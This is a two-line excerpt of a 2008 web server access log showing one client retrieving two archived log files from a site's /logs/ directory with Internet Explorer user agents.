89.181.61.205 - - [22/Jan/2008:10:41:13 -0800] "GET /logs/access_071019.log HTTP/1.1" 200 78488 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:41:15 -0800] "GET /logs/access_071213.log HTTP/1.1" 200 79346 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
